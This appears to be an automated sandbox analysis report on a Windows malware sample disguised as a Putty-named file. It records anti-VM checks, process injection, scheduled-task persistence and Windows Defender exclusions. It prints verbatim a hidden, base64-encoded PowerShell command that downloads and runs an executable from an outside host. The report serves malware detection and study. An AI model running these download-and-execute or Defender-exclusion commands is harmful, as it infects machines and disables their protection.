Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: HODoCxSdp.exe PID: 7476, type: MEMORYSTR

Delayed program exit found

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0040E18D Sleep,ExitProcess,

17_2_0040E18D

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory allocated: 880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory allocated: 26C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory allocated: 2420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory allocated: 72A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory allocated: 82A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory allocated: 8440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory allocated: 9440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory allocated: D00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory allocated: 2800000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory allocated: DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory allocated: 6E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory allocated: 7E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory allocated: 8000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory allocated: 9000000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

17_2_004186FE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4044	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8593	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 944	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7976	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1115	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Window / User API: threadDelayed 9818	Jump to behavior

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

API coverage: 5.2 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3444	Thread sleep count: 4044 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152	Thread sleep count: 5800 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif TID: 3180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6920	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2912	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep count: 8593 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep count: 944 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif TID: 7444	Thread sleep count: 177 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif TID: 7444	Thread sleep time: -531000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif TID: 7444	Thread sleep count: 9818 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif TID: 7444	Thread sleep time: -29454000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_0041A01B
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	17_2_0040B28E
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_0040838E
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_004087A0
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00407848
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004068CD FindFirstFileW,FindNextFileW,	17_2_004068CD
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040AA71
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_00417AAB
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040AC78

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406D28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Thread delayed: delay time: 922337203685477

Source: PuttyTest777.pif, 00000003.00000002.1739779498.0000000000911000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: PuttyTest777.pif, 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: svchost.exe, 00000004.00000002.3309009602.0000016FEB82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3309694916.0000016FF0E55000.00000004.00000020.00020000.00000000.sdmp, PuttyTest777.pif, 0000000B.00000002.4093567792.00000000012B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1728188277.000001CCF6712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

17_2_004327AE

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

17_2_0041A8DA

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004407B5 mov eax, dword ptr fs:[00000030h]

17_2_004407B5

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

17_2_00410763

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_004327AE
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004328FC SetUnhandledExceptionFilter,	17_2_004328FC
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_004398AC
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00432D5C

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"	Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded INvoKE-wEbReqUEsT -URi https://remisat.com.uy/zti/hot.exe -ouTFiLe $enV:aPpdata\PuttyTest777.pif ; iNvokE-iTem $Env:apPDatA\PuttyTest777.pif
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded INvoKE-wEbReqUEsT -URi https://remisat.com.uy/zti/hot.exe -ouTFiLe $enV:aPpdata\PuttyTest777.pif ; iNvokE-iTem $Env:apPDatA\PuttyTest777.pif			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Memory written: C:\Users\user\AppData\Roaming\PuttyTest777.pif base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Memory written: C:\Users\user\AppData\Roaming\HODoCxSdp.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

17_2_00410B5C

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004175E1 mouse_event,

17_2_004175E1

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\PuttyTest777.pif "C:\Users\user\AppData\Roaming\PuttyTest777.pif"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Users\user\AppData\Roaming\PuttyTest777.pif "C:\Users\user\AppData\Roaming\PuttyTest777.pif"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp"
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd /c powershell -ex bypass -nop -w hidden -ec iaajaekatgb2ag8aswbfac0adwbfagiaugblaheavqbfahmavaagac0avqbsagkaiaajab0gaab0ahqacabzadoalwavahiazqbtagkacwbhahqalgbjag8abqauahuaeqavahoadabpac8aaabvahqalgblahgazqadicaalqbvahuavabgagkatablacaacqadicqazqbuafyaogbhafaacabkageadabhafwauab1ahqadab5afqazqbzahqanwa3adcalgbwagkazgadicaaiaa7acaacqbpae4adgbvagsarqatagkavablag0aiaajab0gjabfag4adga6ageacabqaeqayqb0aeeaxabqahuadab0ahkavablahmadaa3adcanwauahaaaqbmab0g
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w hidden -ec iaajaekatgb2ag8aswbfac0adwbfagiaugblaheavqbfahmavaagac0avqbsagkaiaajab0gaab0ahqacabzadoalwavahiazqbtagkacwbhahqalgbjag8abqauahuaeqavahoadabpac8aaabvahqalgblahgazqadicaalqbvahuavabgagkatablacaacqadicqazqbuafyaogbhafaacabkageadabhafwauab1ahqadab5afqazqbzahqanwa3adcalgbwagkazgadicaaiaa7acaacqbpae4adgbvagsarqatagkavablag0aiaajab0gjabfag4adga6ageacabqaeqayqb0aeeaxabqahuadab0ahkavablahmadaa3adcanwauahaaaqbmab0g
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w hidden -ec iaajaekatgb2ag8aswbfac0adwbfagiaugblaheavqbfahmavaagac0avqbsagkaiaajab0gaab0ahqacabzadoalwavahiazqbtagkacwbhahqalgbjag8abqauahuaeqavahoadabpac8aaabvahqalgblahgazqadicaalqbvahuavabgagkatablacaacqadicqazqbuafyaogbhafaacabkageadabhafwauab1ahqadab5afqazqbzahqanwa3adcalgbwagkazgadicaaiaa7acaacqbpae4adgbvagsarqatagkavablag0aiaajab0gjabfag4adga6ageacabqaeqayqb0aeeaxabqahuadab0ahkavablahmadaa3adcanwauahaaaqbmab0g	Jump to behavior

Source: PuttyTest777.pif, 0000000B.00000002.4092646965.000000000128F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerG
Source: PuttyTest777.pif, 0000000B.00000002.4092646965.000000000128F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: PuttyTest777.pif, 0000000B.00000002.4092646965.000000000128F000.00000004.00000020.00020000.00000000.sdmp, PuttyTest777.pif, 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004329DA cpuid

17_2_004329DA

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: EnumSystemLocalesW,	17_2_0044F17B
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: EnumSystemLocalesW,	17_2_0044F130
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: EnumSystemLocalesW,	17_2_0044F216
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044F2A3
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: GetLocaleInfoA,	17_2_0040E2BB
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: GetLocaleInfoW,	17_2_0044F4F3
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_0044F61C
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: GetLocaleInfoW,	17_2_0044F723
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044F7F0
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: EnumSystemLocalesW,	17_2_00445914
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: GetLocaleInfoW,	17_2_00445E1C
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	17_2_0044EEB8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Users\user\AppData\Roaming\PuttyTest777.pif VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
